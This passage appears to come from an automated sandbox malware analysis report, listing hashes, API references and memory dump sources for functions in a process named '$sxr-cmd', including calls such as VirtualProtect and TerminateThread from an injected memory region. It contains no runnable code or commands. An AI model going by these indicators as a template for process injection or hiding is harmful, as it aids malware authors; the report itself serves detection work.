                                                                                                                      • Opcode Fuzzy Hash: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                                      • Instruction Fuzzy Hash: D011BF21719B4086E350CB82E85831977B1F788FF4F840224EA5D8B7D5EF7EC9148744
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memsetwcsspn
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3809306610-0
                                                                                                                      • Opcode ID: dc78cd9d6f231a5cf0425b770118c4c3823133ec0f4f9eb011d5dfda8e43b70b
                                                                                                                      • Instruction ID: 0c6eaa80c011cc591941be8042d1a1025514b4b90c3863c70e574819712393fe
                                                                                                                      • Opcode Fuzzy Hash: dc78cd9d6f231a5cf0425b770118c4c3823133ec0f4f9eb011d5dfda8e43b70b
                                                                                                                      • Instruction Fuzzy Hash: B5B15D79A08E4686EA50CB15E4502BAA7A0FB45FE8F958032DA4EC77B5DF7DEC41C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$Current$Context
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1666949209-0
                                                                                                                      • Opcode ID: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                                      • Instruction ID: db0dd7d2e6e7708f9ea3eb998b4af1b49bcaca688a2ad2a3de678c9c14c124ca
                                                                                                                      • Opcode Fuzzy Hash: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                                      • Instruction Fuzzy Hash: BED1BC3620AF8885EA70DB5AE49835A77B1F788B94F504116EECD4BBA6DF3DC541CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcschr$iswdigit$wcstol
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3841054028-0
                                                                                                                      • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                                      • Instruction ID: d990389f3b9634c68cb7c8d067d4dd4bb97801826c485f4d89d80eb18bccde74
                                                                                                                      • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                                      • Instruction Fuzzy Hash: AD51A32AA08A5281E7749F2594401B9BAB1FF68FB4B458235DE5D866F4DF3CAC92C300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF615513687
                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6154F260D), ref: 00007FF6155136A6
                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6154F260D), ref: 00007FF6155136EB
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF615513703
                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6154F260D), ref: 00007FF615513722
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Console$Write_get_osfhandle$Mode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1066134489-0
                                                                                                                      • Opcode ID: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                                                      • Instruction ID: 3e5b5a4ed98cac357e59a2aaa4f133764e63f9eab97feebfd40aaa1596b1c382
                                                                                                                      • Opcode Fuzzy Hash: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                                                      • Instruction Fuzzy Hash: 7151A269B08A4287EA245F25A55457AEAA1FF44FB4F094435DE4EC37B2DF3CEC408B00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                                      • String ID: $sxr
                                                                                                                      • API String ID: 756756679-21942930
                                                                                                                      • Opcode ID: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
                                                                                                                      • Instruction ID: 465fd03b997bb63ed42ff3cab571e4018e78409a02091606b8be4e4fc997fed0
                                                                                                                      • Opcode Fuzzy Hash: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
                                                                                                                      • Instruction Fuzzy Hash: 6A318D2170BF5186F615DF96E54836973B2BB44BA0F888020DF8D0BB56FB3AC4658704
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF615503578: _get_osfhandle.MSVCRT ref: 00007FF615503584
                                                                                                                        • Part of subcall function 00007FF615503578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF61550359C
                                                                                                                        • Part of subcall function 00007FF615503578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035C3
                                                                                                                        • Part of subcall function 00007FF615503578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035D9
                                                                                                                        • Part of subcall function 00007FF615503578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035ED
                                                                                                                        • Part of subcall function 00007FF615503578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF615503602
                                                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF615503514
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF615503522
                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF615503541
                                                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF61550355E
                                                                                                                        • Part of subcall function 00007FF6155036EC: _get_osfhandle.MSVCRT ref: 00007FF615503715
                                                                                                                        • Part of subcall function 00007FF6155036EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF615503770
                                                                                                                        • Part of subcall function 00007FF6155036EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF615503791
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4057327938-0
                                                                                                                      • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                                      • Instruction ID: 371784a28ace271bb4944c8a6d79a8428d1bec086cc18f617cb17837334e53f9
                                                                                                                      • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                                      • Instruction Fuzzy Hash: CF317E29B08E42CAE7549F25A44107DEAA0EF89F65F59413ADA0EC37B6DF3CEC048700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                                                      • String ID: KEYS$LIST$OFF
                                                                                                                      • API String ID: 411561164-4129271751
                                                                                                                      • Opcode ID: c38282f1f6cd5fcd5e02bcbb4014cff48c361062c3933522ffdf7c7e831c5595
                                                                                                                      • Instruction ID: bb71b73e2a9f7ba84e89895be1d6db992f6e3c488bfd02516b8a3ed58c2fe895
                                                                                                                      • Opcode Fuzzy Hash: c38282f1f6cd5fcd5e02bcbb4014cff48c361062c3933522ffdf7c7e831c5595
                                                                                                                      • Instruction Fuzzy Hash: 46213029E08E03D1F6149F29A491175EAB1EF84F70F419235D61EC62F5EF7C9C448700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF6155001C4
                                                                                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF61550E904,?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF6155001D6
                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF61550E904,?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF615500212
                                                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF61550E904,?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF615500228
                                                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF61550E904,?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF61550023C
                                                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF61550E904,?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF615500251
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 513048808-0
                                                                                                                      • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                                      • Instruction ID: 0c203eb6a5136d2c96eb4742db2bf7e56381c48ca6cd254f602e5c9a2493eaba
                                                                                                                      • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                                      • Instruction Fuzzy Hash: 74215C2990CE83C7E6504BA4E984239EB90FF49F79F555236DA0EC26B1DF7CAC448700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF615503584
                                                                                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF61550359C
                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035C3
                                                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035D9
                                                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035ED
                                                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF615503602
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 513048808-0
                                                                                                                      • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                      • Instruction ID: e3a393c446e8f2d974546de2b2237dad0d851483aa9407034899d87c26d129a5
                                                                                                                      • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                      • Instruction Fuzzy Hash: EA115129A08E42C6EA104B64E544079EA90FF49F79F1A5735DA2EC27F1DF3CDC448700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104442557-0
                                                                                                                      • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                      • Instruction ID: 00dea9e8ba4fe80163a70baf7ab9586ee1dd442fff864759ea66b529cee0933f
                                                                                                                      • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                      • Instruction Fuzzy Hash: C6114F26604F41CAEF00DF70E8441A873A4FB09F68F410A31EA6D87B64EF3CDAA58740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 517849248-0
                                                                                                                      • Opcode ID: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
                                                                                                                      • Instruction ID: 8adc426835350826459c8e5c9084611fbb4a68f2a0d3b1f14e0cf7e6298dbd6e
                                                                                                                      • Opcode Fuzzy Hash: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
                                                                                                                      • Instruction Fuzzy Hash: EF015B21709B8196FA10DB92E45835963A2FB88FE1F888034CE8D4B755EE3EC9858744
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 449555515-0
                                                                                                                      • Opcode ID: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
                                                                                                                      • Instruction ID: 5cf49d1a071ca34c8d8ee550cd69a13bfc7a0020d28b559792b9179741ef7094
                                                                                                                      • Opcode Fuzzy Hash: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
                                                                                                                      • Instruction Fuzzy Hash: 4B11396560AB4086FB24DBA1E84C76932B2BB48FA1F840425C95D0E356FF3EC0088718
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6155171F9
                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF61551720D
                                                                                                                      • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF615517300
                                                                                                                        • Part of subcall function 00007FF615515740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF6155175C4,?,?,00000000,00007FF615516999,?,?,?,?,?,00007FF615508C39), ref: 00007FF615515744
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: OpenSemaphore$CloseErrorHandleLast
                                                                                                                      • String ID: _p0$wil
                                                                                                                      • API String ID: 455305043-1814513734
                                                                                                                      • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                                      • Instruction ID: 13baa382627559649449ab590e254f142322265255bfe4d079cfebee63ec43a9
                                                                                                                      • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                                      • Instruction Fuzzy Hash: 0E61A469B28E8285EF258F6994901B9A7B1FF84FA4F544531DA0E8B7A5EF3CDD058300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                      • String ID: csm$f
                                                                                                                      • API String ID: 2395640692-629598281
                                                                                                                      • Opcode ID: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
                                                                                                                      • Instruction ID: 6448cbd064bb5c7f42280aa81c0e2d51b40f6540c676c91d3383f40e97003410
                                                                                                                      • Opcode Fuzzy Hash: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
                                                                                                                      • Instruction Fuzzy Hash: 5E518D3261BB008AFB14CB55E448B5937B6F3C4BA8F918134DE1A4B7CAEB36C941CB04
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
